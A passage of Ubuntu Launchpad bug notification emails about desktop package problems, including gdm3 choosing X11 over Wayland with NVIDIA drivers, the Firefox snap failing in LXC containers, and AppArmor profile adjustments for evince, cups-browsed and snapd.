[Desktop-packages] [Bug 2062128] [NEW] Booting with nvidia proprietary drivers 550.67 results in gdm3 being displayed on X11 rather than Wayland
Public bug reported: I am testing Ubuntu 24.04 beta and using the proprietary NVIDIA drivers (550.67). Prior to installing the drivers packages (using nouveau), the system would load gdm3 in Wayland. After installer the drivers package, the system would load gdm3 in X11. This appears to be caused by the configuration file at /usr/lib/udev/rules.d/61-gdm.rules However, according to the comments in the rules file, it should prefer Wayland: # Disable wayland when nvidia modeset is disabled or when drivers are a lower # version than 470, # For versions above 470 but lower than 510 prefer Xorg, # Above 510, prefer Wayland. I am able to work around this by making a system override on the file, in /etc/udev/rules.d: lrwxrwxrwx 1 root root 9 Apr 18 00:34 61-gdm.rules -> /dev/null With this in place, when booting, gdm3 will be loaded with Wayland. ** Affects: gdm3 (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to gdm3 in Ubuntu. https://bugs.launchpad.net/bugs/2062128 Title: Booting with nvidia proprietary drivers 550.67 results in gdm3 being displayed on X11 rather than Wayland Status in gdm3 package in Ubuntu: New Bug description: I am testing Ubuntu 24.04 beta and using the proprietary NVIDIA drivers (550.67). Prior to installing the drivers packages (using nouveau), the system would load gdm3 in Wayland. After installer the drivers package, the system would load gdm3 in X11. This appears to be caused by the configuration file at /usr/lib/udev/rules.d/61-gdm.rules However, according to the comments in the rules file, it should prefer Wayland: # Disable wayland when nvidia modeset is disabled or when drivers are a lower # version than 470, # For versions above 470 but lower than 510 prefer Xorg, # Above 510, prefer Wayland. I am able to work around this by making a system override on the file, in /etc/udev/rules.d: lrwxrwxrwx 1 root root 9 Apr 18 00:34 61-gdm.rules -> /dev/null With this in place, when booting, gdm3 will be loaded with Wayland. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gdm3/+bug/2062128/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 2003339] Re: kwin_x11: The X11 connection broke: I/O error (code 1)
According to the launchpad page for mesa 22.2.5-0ubuntu0.1~22.04.2 (https://launchpad.net/ubuntu/+source/mesa/22.2.5-0ubuntu0.1~22.04.2) the package is still in proposed, not updates. @tjaalton 's message in #72 suggests it has been released to updates but this appears incorrect. I'm on 22.04 with the updates archive enabled but not proposed and I'm not seeing the available update. Temporarily enabling proposed and looking at upgradable packages shows 22.2.5-0ubuntu0.1~22.04.2 which matches up which the launchpad page. Is there an ETA for this package to land in updates? -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to mesa in Ubuntu. https://bugs.launchpad.net/bugs/2003339 Title: kwin_x11: The X11 connection broke: I/O error (code 1) Status in KDE Base Workspace: Fix Released Status in Mesa: Fix Released Status in kwin package in Ubuntu: Invalid Status in mesa package in Ubuntu: Fix Released Status in kwin source package in Jammy: Invalid Status in mesa source package in Jammy: Fix Released Status in kwin package in Debian: New Bug description: [Impact] kwin might crash after running some time Two commits have been reverted upstream since 22.2.x branch was closed, needs those backported to fix this. [Test case] Run kwin for a day or so, which is usually enough time to hit this. Crash happens mostly on a notification popups, so system must be actively receiving notifications to test the crash. Without that crash may not happen even in a week of runtime. [Where things could go wrong] This just reverts two commits, and they have been upstream for a few months now, so these causing a regression is unlikely. To manage notifications about this bug go to: https://bugs.launchpad.net/kdebase-workspace/+bug/2003339/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1994453] Re: Firefox Snap cannot be installed in an LXC Container
I also see this on a 20.04 host with a 20.04 container. $ lxc version Client version: 5.0.2 Server version: 5.0.2 $ lxc launch ubuntu:20.04 foo $ lxc stop foo $ lxc config set foo security.nesting true $ lxc start foo $ lxc shell foo root@foo:~# snap install firefox error: cannot perform the following tasks: - Run hook connect-plug-host-hunspell of snap "firefox" (run hook "connect-plug-host-hunspell": - update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/cups/doc-root /usr/share/cups/doc-root none bind,ro 0 0): cannot open directory "/var/lib": permission denied update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/gimp/2.0/help /usr/share/gimp/2.0/help none bind,ro 0 0): cannot open directory "/var/lib": permission denied update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/gtk-doc /usr/share/gtk-doc none bind,ro 0 0): cannot open directory "/var/lib": permission denied update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/libreoffice/help /usr/share/libreoffice/help none bind,ro 0 0): cannot open directory "/var/lib": permission denied update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/xubuntu-docs /usr/share/xubuntu-docs none bind,ro 0 0): cannot open directory "/var/lib": permission denied error: error running snapctl: cannot start mount unit: systemctl command [start var-snap-firefox-common-host\x2dhunspell.mount] failed with exit status 1: A dependency job for var-snap-firefox-common-host\x2dhunspell.mount failed. See 'journalctl -xe' for details. -) No AppArmor denials on the host or within the container. root@foo:~# journalctl -xe | cat Mar 28 14:26:26 foo snapd[196]: - Mar 28 14:26:26 foo systemd[1]: snap.firefox.hook.connect-plug-host-hunspell.a7817955-d538-4a15-ae4e-1f7f00c4d00d.scope: Succeeded. -- Subject: Unit succeeded -- Defined-By: systemd -- Support: http://www.ubuntu.com/support -- -- The unit snap.firefox.hook.connect-plug-host-hunspell.a7817955-d538-4a15-ae4e-1f7f00c4d00d.scope has successfully entered the 'dead' state. Mar 28 14:26:28 foo systemd[370]: run-snapd-ns-firefox.mnt.mount: Succeeded. -- Subject: Unit succeeded -- Defined-By: systemd -- Support: http://www.ubuntu.com/support -- -- The unit UNIT has successfully entered the 'dead' state. Mar 28 14:26:28 foo systemd[1]: run-snapd-ns-firefox.mnt.mount: Succeeded. -- Subject: Unit succeeded -- Defined-By: systemd -- Support: http://www.ubuntu.com/support -- -- The unit run-snapd-ns-firefox.mnt.mount has successfully entered the 'dead' state. Mar 28 14:26:28 foo systemd[370]: snap-firefox-2487.mount: Succeeded. -- Subject: Unit succeeded -- Defined-By: systemd -- Support: http://www.ubuntu.com/support -- -- The unit UNIT has successfully entered the 'dead' state. Mar 28 14:26:28 foo systemd[1]: snap-firefox-2487.mount: Succeeded. -- Subject: Unit succeeded -- Defined-By: systemd -- Support: http://www.ubuntu.com/support -- -- The unit snap-firefox-2487.mount has successfully entered the 'dead' state. Mar 28 14:26:28 foo systemd[1]: Reloading. Mar 28 14:26:28 foo systemd[1]: Cannot find unit for notify message of PID 1318, ignoring. Mar 28 14:26:29 foo snapd[196]: handlers.go:662: Reported install problem for "firefox" as Crash report successfully submitted. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to firefox in Ubuntu. https://bugs.launchpad.net/bugs/1994453 Title: Firefox Snap cannot be installed in an LXC Container Status in lxd: New Status in snapd: New Status in firefox package in Ubuntu: Confirmed Bug description: $ sudo snap install firefox error: cannot perform the following tasks: - Run hook connect-plug-host-hunspell of snap "firefox" (run hook "connect-plug-host-hunspell": - update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/cups/doc-root /usr/share/cups/doc-root none bind,ro 0 0): cannot create directory "/usr/share/cups/doc-root": permission denied update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/gimp/2.0/help /usr/share/gimp/2.0/help none bind,ro 0 0): cannot create directory "/usr/share/gimp/2.0": permission denied update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/libreoffice/help /usr/share/libreoffice/help none bind,ro 0 0): cannot create directory "/usr/share/libreoffice/help": permission denied error: error running snapctl: cannot start mount unit: systemctl command [start var-snap-firefox-common-host\x2dhunspell.mount] failed with exit status 1: A dependency job for var-snap-firefox-common-host\x2dhunspell.mount failed. See 'journalctl -xe' for details.
[Desktop-packages] [Bug 1994453] Re: Firefox Snap cannot be installed in an LXC Container
** Also affects: snapd Importance: Undecided Status: New ** Also affects: lxd Importance: Undecided Status: New -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to firefox in Ubuntu. https://bugs.launchpad.net/bugs/1994453 Title: Firefox Snap cannot be installed in an LXC Container Status in lxd: New Status in snapd: New Status in firefox package in Ubuntu: Confirmed Bug description: $ sudo snap install firefox error: cannot perform the following tasks: - Run hook connect-plug-host-hunspell of snap "firefox" (run hook "connect-plug-host-hunspell": - update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/cups/doc-root /usr/share/cups/doc-root none bind,ro 0 0): cannot create directory "/usr/share/cups/doc-root": permission denied update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/gimp/2.0/help /usr/share/gimp/2.0/help none bind,ro 0 0): cannot create directory "/usr/share/gimp/2.0": permission denied update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/libreoffice/help /usr/share/libreoffice/help none bind,ro 0 0): cannot create directory "/usr/share/libreoffice/help": permission denied error: error running snapctl: cannot start mount unit: systemctl command [start var-snap-firefox-common-host\x2dhunspell.mount] failed with exit status 1: A dependency job for var-snap-firefox-common-host\x2dhunspell.mount failed. See 'journalctl -xe' for details. -) This makes it very difficult to have LXC containers with a GUI (used via VNC), as a web browser is essential. Workaround: - Add the Mozillateam PPA (https://ppa.launchpadcontent.net/mozillateam/ppa/ubuntu) - Create /etc/apt/preferences.d/mozilla-firefox with: Package: firefox* Pin: release o=LP-PPA-mozillateam Pin-Priority: 1001 - sudo apt install firefox ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: firefox 1:1snap1-0ubuntu2 ProcVersionSignature: Ubuntu 5.15.0-48.54-generic 5.15.53 Uname: Linux 5.15.0-48-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.11-0ubuntu82.1 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: KDE Date: Wed Oct 26 14:16:04 2022 InstallationDate: Installed on 2020-11-02 (722 days ago) InstallationMedia: Ubuntu-Server 18.04.4 LTS "Bionic Beaver" - Release amd64 (20200203.1) Snap.Changes: no changes found SourcePackage: firefox UpgradeStatus: Upgraded to jammy on 2022-10-03 (22 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/lxd/+bug/1994453/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1968498] [NEW] Unhandled promise rejection after screenlock/unlock
Public bug reported: After upgrading from focal to jammy, I noticed this in my logs: Apr 10 14:05:40 host ubuntu-appindicat...@ubuntu.com[124051]: unable to update icon for software-update-available Apr 10 14:05:40 host gnome-shell[124051]: Unhandled promise rejection. To suppress this warning, add an error handler to your promise chain with .catch() or a try-catch block around your await expression. Stack trace of the failed promise: _checkNeededProperties@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:133:33 _nameOwnerChanged@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:154:18 _emit@resource:///org/gnome/gjs/modules/core/_signals.js:114:47 AppIndicatorsNameWatcher/this._watcherId<@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/util.js:205:22 This happens after screenlock/unlock. It looks like https://github.com/ubuntu/gnome-shell-extension- appindicator/issues/334 was filed for this as well. ** Affects: gnome-shell-extension-appindicator (Ubuntu) Importance: Undecided Status: New ** Description changed: After upgrading from focal to jammy, I noticed this in my logs: - Apr 10 14:05:40 iolanthe ubuntu-appindicat...@ubuntu.com[124051]: unable to update icon for software-update-available - Apr 10 14:05:40 iolanthe gnome-shell[124051]: Unhandled promise rejection. To suppress this warning, add an error handler to your promise chain with .catch() or a try-catch block around your await expression. Stack trace of the failed promise: - _checkNeededProperties@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:133:33 - _nameOwnerChanged@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:154:18 - _emit@resource:///org/gnome/gjs/modules/core/_signals.js:114:47 - AppIndicatorsNameWatcher/this._watcherId<@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/util.js:205:22 + Apr 10 14:05:40 host ubuntu-appindicat...@ubuntu.com[124051]: unable to update icon for software-update-available + Apr 10 14:05:40 host gnome-shell[124051]: Unhandled promise rejection. To suppress this warning, add an error handler to your promise chain with .catch() or a try-catch block around your await expression. Stack trace of the failed promise: + _checkNeededProperties@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:133:33 + _nameOwnerChanged@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:154:18 + _emit@resource:///org/gnome/gjs/modules/core/_signals.js:114:47 + AppIndicatorsNameWatcher/this._watcherId<@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/util.js:205:22 This happens after screenlock/unlock. It looks like https://github.com/ubuntu/gnome-shell-extension- appindicator/issues/334 was filed for this as well. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-shell-extension-appindicator in Ubuntu. https://bugs.launchpad.net/bugs/1968498 Title: Unhandled promise rejection after screenlock/unlock Status in gnome-shell-extension-appindicator package in Ubuntu: New Bug description: After upgrading from focal to jammy, I noticed this in my logs: Apr 10 14:05:40 host ubuntu-appindicat...@ubuntu.com[124051]: unable to update icon for software-update-available Apr 10 14:05:40 host gnome-shell[124051]: Unhandled promise rejection. To suppress this warning, add an error handler to your promise chain with .catch() or a try-catch block around your await expression. Stack trace of the failed promise: _checkNeededProperties@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:133:33 _nameOwnerChanged@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:154:18 _emit@resource:///org/gnome/gjs/modules/core/_signals.js:114:47 AppIndicatorsNameWatcher/this._watcherId<@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/util.js:205:22 This happens after screenlock/unlock. It looks like
[Desktop-packages] [Bug 1794064] Re: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap
Olivier, yes, I shouldn't be assigned. Ian, you're right the profile is suboptimal (it's also old so likely needs updating). Do note that this is a separate named profile and evince (and if this is put in an abstraction, anything that uses the abstraction) only has the `/{,snap/core/[0-9]*/}usr/bin/snap mrCx -> snap_browser,` rule which means that it is able to run the 'snap' command (needed since everything in /snap/bin points to /usr/bin/snap) which at the time I wrote the profile meant that access to this socket was needed as part of snap run. IIRC, snapd should be protecting certain actions by uid connecting to it (eg, you are root or not), but it has been a while since I've looked at that. Evince is not a snap though so if snapd does any checks on 'is the client a snap' then those would fail and evince would be able to do whatever a non-root user could do with the 'snap' command via the socket. For snap run, we can see that the snap_browser profile limits what can be used with 'run' since (at the time I wrote the comment) 'snap run' required being able to look at the meta/snap.yaml of the specific snap. This 'works' (worked?) but is brittle since if snap run changed to lift this requirement (eg, 'snap run' just passed the name of the unresolved symlink to snapd over the socket and let snapd start the snap, perhaps via userd, etc) then this falls apart. The profile was put up as an example as what could be done at the time without any help from snapd. I never particularly cared for it cause it was brittle and not designed. I'm not sure how to fix this, but here are some thoughts: * evince is just executing stuff from /snap/bin (probably via the system's xdg-open). Assuming xdg-open, the system's xdg-open (or whatever evince is using to decide and launch the default browser) could itself be fixed in Ubuntu to launch a different command that behaved better. This wouldn't necessarily fix other distros (though this is the evince profile in Debian and Ubuntu, so *technically*, if you got this change (to presumably xdg-open) into them, you could update the evince profile in them accordingly) * In lieu of that, if the profile still worked as intended, snapd could be hardened to look to check more than if the connecting process is root or a snap; it could also see if it is running under a non-snap profile, then limit access to the socket API accordingly. This has drawbacks and could break people who have written custom profiles similar to what I presented. * I suppose an alternative approach would be to have symlinks in /snap/bin for things that are registered as browsers (or just the default browser) point to a designed snap command. Eg: /snap/bin/firefox -> /usr/bin/snap # keep the existing one too /snap/bin/default-browser-is-a-snap -> /usr/bin/snap-browser # name is illustrative, TBD Now firefox, chromium, opera, brave, etc snaps registers themselves as being capable of being a default browser with snapd, then snapd registers with the system that /snap/bin/default-browser-is-a-snap is the default browser (so system utilities like xdg-open don't need to change) and /usr/bin/snap-browser is written to be safe (eg, only able to 'snap run' the configured default browser, nothing else) and apparmor profiles are adjusted to have `/{,snap/core/[0-9]*/}usr/bin/snap-browser Uxr,` (or similar). The /snap/bin/default-browser-is-a-snap path is illustrative and there isn't really a need for it at all. Could simply perhaps have snapd register /usr/bin/snap-browser as the default browser on the system (it now needs to know what snapd configured as the default browser snap though) and forego the symlink. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1794064 Title: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap Status in apparmor package in Ubuntu: Confirmed Status in evince package in Ubuntu: Triaged Bug description: This is related to bug #1792648. After fixing that one (see discussion at https://salsa.debian.org/gnome-team/evince/merge_requests/1), clicking a hyperlink in a PDF opens it correctly if the default browser is a well-known application (such as /usr/bin/firefox), but it fails to do so if the default browser is a snap (e.g. the chromium snap). This is not a recent regression, it's not working on bionic either. ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.0-2 ProcVersionSignature: Ubuntu 4.18.0-7.8-generic 4.18.5 Uname: Linux 4.18.0-7-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.10-0ubuntu11 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Mon Sep 24 12:28:06 2018 EcryptfsInUse: Yes InstallationDate: Installed on 2016-07-02 (813 days ago) InstallationMedia: Ubuntu 16.04 LTS "Xenial
[Desktop-packages] [Bug 1794064] Re: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap
** Changed in: evince (Ubuntu) Assignee: Jamie Strandboge (jdstrand) => (unassigned) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1794064 Title: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap Status in apparmor package in Ubuntu: Confirmed Status in evince package in Ubuntu: Triaged Bug description: This is related to bug #1792648. After fixing that one (see discussion at https://salsa.debian.org/gnome-team/evince/merge_requests/1), clicking a hyperlink in a PDF opens it correctly if the default browser is a well-known application (such as /usr/bin/firefox), but it fails to do so if the default browser is a snap (e.g. the chromium snap). This is not a recent regression, it's not working on bionic either. ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.0-2 ProcVersionSignature: Ubuntu 4.18.0-7.8-generic 4.18.5 Uname: Linux 4.18.0-7-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.10-0ubuntu11 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Mon Sep 24 12:28:06 2018 EcryptfsInUse: Yes InstallationDate: Installed on 2016-07-02 (813 days ago) InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1) SourcePackage: evince UpgradeStatus: Upgraded to cosmic on 2018-09-14 (9 days ago) modified.conffile..etc.apparmor.d.abstractions.evince: [modified] mtime.conffile..etc.apparmor.d.abstractions.evince: 2018-09-24T11:35:41.904158 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1794064/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1933828] Re: NTP servers from DHCP are not propagated to timesyncd
** Changed in: oem-priority Importance: Undecided => Critical -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to network-manager in Ubuntu. https://bugs.launchpad.net/bugs/1933828 Title: NTP servers from DHCP are not propagated to timesyncd Status in OEM Priority Project: New Status in network-manager package in Ubuntu: New Status in network-manager source package in Focal: New Bug description: Network manager gets NTP servers from DHCP but do not update timesyncd to use it which keeps using ntp.ubuntu.com. This is a problem on private networks which do not have access to public internet. On this type of network the configuration of timesyncd must be updated manually instead of inheriting the conf from the dhcp servers. This can be integrated with a NM dispatcher script such as below: etc/NetworkManager/dispatcher.d/10-update-timesyncd for example: ==8<=8<=8<=8<=8<== #! /usr/bin/bash [ -n "$CONNECTION_UUID" ] || exit INTERFACE=$1 ACTION=$2 case $ACTION in up | dhcp4-change | dhcp6-change) [ -n "$DHCP4_NTP_SERVERS" ] || exit mkdir -p /etc/systemd/timesyncd.conf.d/ cat< /etc/systemd/timesyncd.conf.d/$CONNECTION_UUID.conf [Time] NTP=$DHCP4_NTP_SERVERS RootDistanceMaxSec=15 EOF systemctl restart systemd-timesyncd ;; down) rm -f /etc/systemd/timesyncd.conf.d/$CONNECTION_UUID.conf systemctl restart systemd-timesyncd ;; esac ==8<=8<=8<=8<=8<== ProblemType: Bug DistroRelease: Ubuntu 21.10 Package: network-manager 1.30.0-1ubuntu3 ProcVersionSignature: Ubuntu 5.11.0-18.19+21.10.1-generic 5.11.17 Uname: Linux 5.11.0-18-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.11-0ubuntu67 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: ubuntu:GNOME Date: Mon Jun 28 14:08:52 2021 InstallationDate: Installed on 2020-05-31 (393 days ago) InstallationMedia: Ubuntu 20.10 "Groovy Gorilla" - Alpha amd64 (20200527) RebootRequiredPkgs: linux-image-5.11.0-20-generic linux-base SourcePackage: network-manager UpgradeStatus: No upgrade log present (probably fresh install) nmcli-nm: RUNNING VERSION STATE STARTUP CONNECTIVITY NETWORKING WIFI-HW WIFI WWAN-HW WWAN running 1.30.0 connected started full enabled enabled disabled enabled enabled To manage notifications about this bug go to: https://bugs.launchpad.net/oem-priority/+bug/1933828/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1897369] Re: apparmor: Allow cups-browsed to change nice value (CAP_SYS_NICE)
Till, it allows quite a few things (from man capabilities): CAP_SYS_NICE * Raise process nice value (nice(2), setpriority(2)) and change the nice value for arbitrary processes; * set real-time scheduling policies for calling process, and set scheduling policies and priorities for arbitrary processes (sched_setscheduler(2), sched_setparam(2), sched_setattr(2)); * set CPU affinity for arbitrary processes (sched_setaffinity(2)); * set I/O scheduling class and priority for arbitrary processes (io‐ prio_set(2)); * apply migrate_pages(2) to arbitrary processes and allow processes to be migrated to arbitrary nodes; * apply move_pages(2) to arbitrary processes; * use the MPOL_MF_MOVE_ALL flag with mbind(2) and move_pages(2). cups-browsed is probably just trying to renice itself, which isn't terrible for it to try, but it probably fails gracefully with this just being noise. If it does fail gracefully, you could consider an explicit deny rule to silence the log. Eg: deny capability sys_nice, That said, we've normally allowed system policy (ie, those shipped in debs) to use sys_nice if they have a legitimate use case for it. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to cups in Ubuntu. https://bugs.launchpad.net/bugs/1897369 Title: apparmor: Allow cups-browsed to change nice value (CAP_SYS_NICE) Status in cups package in Ubuntu: Confirmed Bug description: In Ubuntu 20.04.1 with *cups-browsed* 1.27.4-1, apparmor prevents `/usr/sbin/cups-browsed` to change its nice value. $ sudo dmesg | grep apparmor [541870.509461] audit: type=1400 audit(1600898428.089:60): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=62030 comm="cups-browsed" capability=23 capname="sys_nice" [628298.779668] audit: type=1400 audit(1600984854.115:61): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=66850 comm="cups-browsed" capability=23 capname="sys_nice" [714667.424963] audit: type=1400 audit(1601071220.527:62): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=76828 comm="cups-browsed" capability=23 capname="sys_nice" To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cups/+bug/1897369/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
This was fixed in snapd in 2.44 via https://github.com/snapcore/snapd/pull/8467 ** Changed in: snapd (Ubuntu) Status: In Progress => Fix Released ** Changed in: snapd (Ubuntu Focal) Status: In Progress => Fix Released -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to zsys in Ubuntu. https://bugs.launchpad.net/bugs/1871148 Title: services start before apparmor profiles are loaded Status in AppArmor: Invalid Status in snapd: Fix Released Status in apparmor package in Ubuntu: Fix Released Status in snapd package in Ubuntu: Fix Released Status in zsys package in Ubuntu: Invalid Status in apparmor source package in Focal: Fix Released Status in snapd source package in Focal: Fix Released Status in zsys source package in Focal: Invalid Bug description: Per discussion with Zyga in #snapd on Freenode, I have hit a race condition where services are being started by the system before apparmor has been started. I have a complete log of my system showing the effect somewhere within at https://paste.ubuntu.com/p/Jyx6gfFc3q/. Restarting apparmor using `sudo systemctl restart apparmor` is enough to bring installed snaps back to full functionality. Previously, when running any snap I would receive the following in the terminal: --- cannot change profile for the next exec call: No such file or directory snap-update-ns failed with code 1: File exists --- Updated to add for Jamie: $ snap version snap2.44.2+20.04 snapd 2.44.2+20.04 series 16 ubuntu 20.04 kernel 5.4.0-21-generic To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1871148/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1891338] Re: apparmor misconfigured for envice
You are right that there are two places this is defined: in /etc/apparmor.d/abstractions/ubuntu-browsers.d/ubuntu-integration and in /etc/apparmor.d/usr.bin.evince. I'll adjust apparmor to fix ubuntu-integration to use the exo-open abstraction. There is an evince task though because we don't want it to use the ubuntu-integration abstraction. Instead the exo-open stanza in the usr.bin.evince should just include the exo-open abstraction. Ie, replace this: # For Xubuntu to launch the browser /usr/bin/exo-open ixr, /usr/lib/@{multiarch}/xfce4/exo-1/exo-helper-1 ixr, /etc/xdg/xdg-xubuntu/xfce4/helpers.rc r, /etc/xdg/xfce4/helpers.rc r, with this: # For Xubuntu to launch the browser #include ** Also affects: evince (Ubuntu) Importance: Undecided Status: New ** Changed in: apparmor (Ubuntu) Status: New => In Progress ** Changed in: evince (Ubuntu) Status: New => Triaged -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1891338 Title: apparmor misconfigured for envice Status in apparmor package in Ubuntu: In Progress Status in evince package in Ubuntu: Triaged Bug description: On a fully up to date xubuntu 20-04 system, when i run evince and click on a link, it fails to follow that link in my browser. This kind of thing happens when you are reading a technical paper and want to follow one of the references and click on the doi or url. When i click on the link i get a box that i cannot copy from that says: Failed to launch preferred application for category "WebBrowser". Failed to execute child process "/usr/lib/x86_64-linux-gnu/xfce4/exo-2 /exo-helper-2"(Permission denied). Did I say that it is annoying that i could not copy the text in this box!! The output of the ldd command you asked for is attached. I should also point out that this worked fine under xubuntu 18.04. I had originally posted this as an additional comment on https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1869159?comments=all but https://launchpad.net/~seb128 said that I should submit this as a separate bug because this is likely an apparmor configuration problem that is similar to the ancient bug https://bugs.launchpad.net/bugs/987578. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1891338/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1580463] Re: Snap blocks access to system input methods (ibus, fcitx, ...)
I agree that a new bug should be filed. When doing so, please attach any relevant policy violations from journalctl to the bug. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to ibus in Ubuntu. https://bugs.launchpad.net/bugs/1580463 Title: Snap blocks access to system input methods (ibus, fcitx, ...) Status in ibus: Fix Released Status in apparmor package in Ubuntu: Fix Released Status in ibus package in Ubuntu: Fix Released Status in im-config package in Ubuntu: Fix Released Status in snapd package in Ubuntu: Fix Released Status in apparmor source package in Xenial: Fix Released Status in im-config source package in Xenial: Fix Released Status in snapd source package in Xenial: Fix Released Status in apparmor source package in Yakkety: Fix Released Status in im-config source package in Yakkety: Fix Released Status in snapd source package in Yakkety: Fix Released Bug description: = SRU im-config = [Impact] ibus-daemon by default uses a unix socket name of /tmp/dbus-... that is indistinguishable from dbus-daemon abstract sockets. While dbus-daemon has AppArmor mediation, ibus-daemon does not so it is important that its abstract socket not be confused with dbus-daemon's. By modifying ibus-daemon's start arguments to use "--address 'unix:tmpdir=/tmp/ibus'" AppArmor can continue mediating DBus abstract sockets like normal and also mediate access to the ibus-daemon-specific abstract socket via unix rules. This also tidies up the abstract socket paths so that it is clear which are for ibus-daemon, which for dbus-daemon, etc. The upload simply adjusts 21_ibus.rc to start ibus-daemon with "-- address 'unix:tmpdir=/tmp/ibus'" and adds a comment. No compiled code changes are required. [Test Case] 1. start a unity session before updating to the package in -proposed 2. $ grep IBUS_ADDRESS ~/.config/ibus/bus/*-unix-0 IBUS_ADDRESS=unix:abstract=/tmp/dbus-Vyx8fGFA,guid=28e8e7e89f902c8d4e9d77c5557add76 3. $ lsof -p $(pidof 